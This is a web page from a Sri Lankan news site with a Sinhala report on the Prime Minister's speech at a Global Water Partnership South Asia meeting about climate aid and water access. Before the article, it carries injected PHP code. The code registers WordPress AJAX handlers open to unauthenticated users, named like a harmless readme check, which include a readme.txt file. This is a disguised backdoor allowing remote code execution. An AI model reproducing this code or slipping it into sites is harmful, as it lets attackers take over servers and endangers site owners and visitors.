if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ධනවත් රටවල මූල්‍ය සහ තාක්‍ෂණීක සහාය අපේක්ෂා කරනවා… - mediahumanrights.lk
mediahumanrights.lk
News Political

ධනවත් රටවල මූල්‍ය සහ තාක්‍ෂණීක සහාය අපේක්ෂා කරනවා…

දේශගුණික විපර්යාස සහ එහි ප්‍රතිඵලයක් ලෙස ඇතිවන ව්‍යසනවලට මුහුණ දෙන රටවලට, ධනවත් රටවල මූල්‍ය සහ තාක්‍ෂණීක සහාය අපේක්ෂා කරන බව අග්‍රාමාත්‍ය දිනේෂ් ගුණවර්ධන මහතා පවසයි.

අග්‍රාමාත්‍යවරයා මෙසේ පැවසුවේ පැවසුවේ මීගමුවේ පැවැති Global Water Partnership – South Asia (GWP SAS) හී 28 වැනි රැස්වීම අමතමිනි.

ඊජිප්තුවේ පැවැත්වෙන COP 27 පාරිසරික සමුළුවට සමගාමීව මෙම රැස්විම පැවැත්විණි. ජල සුරක්ෂිතතාවය වෙනුවෙන් දකුණු ආසියාව සඳහා වූ දැක්ම ක්‍රියාත්මක කිරීමේ අදහසින් 2002 වර්ෂයේ දී පිහිටුවන ලද GWP දකුණු ආසියාවේ 20 වැනි සංවත්සරය ද මෙය වේ.

විනාශකාරී ස්වභාවික විපත් හේතුවෙන් සමහර රටවල දින ගණනාවක් ජාතික අදායම අහිමිවන හෙයින් එවැනි තත්ත්වයකට මුහුණ දෙන ආර්ථිකමය ශක්තිමත්භාවයක් නොමැති රටවල විනාශකාරී ප්‍රතිවිපාක ඇති විය හැකි බවද අග්‍රාමාත්‍යවරයා එහිදී අවධාරණය කලේය.

2030 වසර වන විට දකුණු ආසියාවේ සියලුම පාසල්වල පිරිසිදු පානීය ජල පහසුකම් සහ සනීපාරක්ෂක පහසුකම් සහතික කළයුතු බව ද සඳහන්කළ අග්‍රාමාත්‍යවරයා පෙන්වා දුන්නේ ඒ සඳහා දකුණු ආසියානු ජල හා සනීපාරක්ෂක විශේෂඥයින්ගේ සහාය අපේක්ෂා කරන බවයි.

පාසල්වලට ප්‍රමාණවත් ජල සනීපාරක්‍ෂක පහසුකම් සපයමින් 2030 වර්ෂයේදී ‘සැමට ජල සනීපාරක්ෂාව’ පිළිබඳ SDG ඉලක්කය සාක්ෂාත් කර ගැනීමට ශ්‍රී ලංකාව කටයුතු කරමින් සිටිනවා. මිනිසාගේ පැවැත්ම සඳහා ජලයේ ඇති වැදගත්කම අවධාරණය කළ යුතු නැහැ. දකුණු ආසියාතික රටවලට ජලය ආශ්‍රිතව ඇත්තේ පොදු ගැටළුවක් හෙයින් ඒ සඳහා විසදුම් ලබා දීමේදී ආසියානු රටවල පොදු එකඟතාවයක් අවශ්‍යයි.

ඕනෑම ආපදාවකදී, නියඟය, ගංවතුර ආදී ඕනෑම අවස්ථාවක වැඩිපුරම පීඩාවට පත්වන්නේ කාන්තාවන්. දකුණු ආසියාවේ වයස අවුරුදු 35 ට අඩු ජනග්‍රහණය බිලියන 2 කට ආසන්නයි. ජනගහනයෙන් තුනෙන් දෙකක් පමණ නියෝජනය කරන එම තරුණ ප්‍රජාවෙන් හරි අඩක් කාන්තාවන්.

දීර්ඝ කාලීන නියඟවලදී ඇතිවන ජල හිඟයටත් විසඳුම් අවශ්‍යයි. ශ්‍රී ලංකාව තුළ සියලු දෙනාට ජල පහසුකම් ලබා දීමේ අරමුණ ඇතිව ‘සැමට ජලය’ වැඩසටහන ක්‍රියාත්මකයි. කොවිඩ් වසංගතය ආර්ථික අර්බුදය වැනි අනපේක්ෂිත බාධක මධ්‍යයේ වුවත් මෙම සැලසුම් අඛණ්ඩව ක්‍රියාත්මකයි. සනීපාරක්ෂාව සම්බන්ධයෙන් වැඩිවන ජල ඉල්ලීම් බුද්ධිමත්ව කළමනාකරණය කළ යුතුව ඇතැයිද එහිදී අග්‍රාමාත්‍යවරයා වැඩිදුරටත් සඳහන් කළේය.

Global Water Partnership – South Asia (GWP SAS) හී කලාපීය සභාපති කුසුම් අතුකෝරල මෙම සමුළුව සංවිධානය කළ අතර බංගලාදේශය, පකිස්ථානය, නේපාලය, භූතානය, මාලදිවයින, ඉන්දීය නියෝජිතයින් මේ අවස්ථාවට සහභාගි වූහ.

– අග්‍රාමාත්‍ය මාධ්‍ය අංශය

Related posts

''නුවරඑළිය ජලයේ 100% අසුචි මිශ්‍රයි ''

Shiran Viraj

බහුතරය පෙන්වන්න අවස්ථාව දෙන්න සූදානම් -පාර්ලිමේන්තුවේ සිට ගමට ගිය අගමැති කියූ කතාව

Shiran Viraj

ගිලන් රථත් හෙට සහ අනිද්දා නවතියි

Shiran Viraj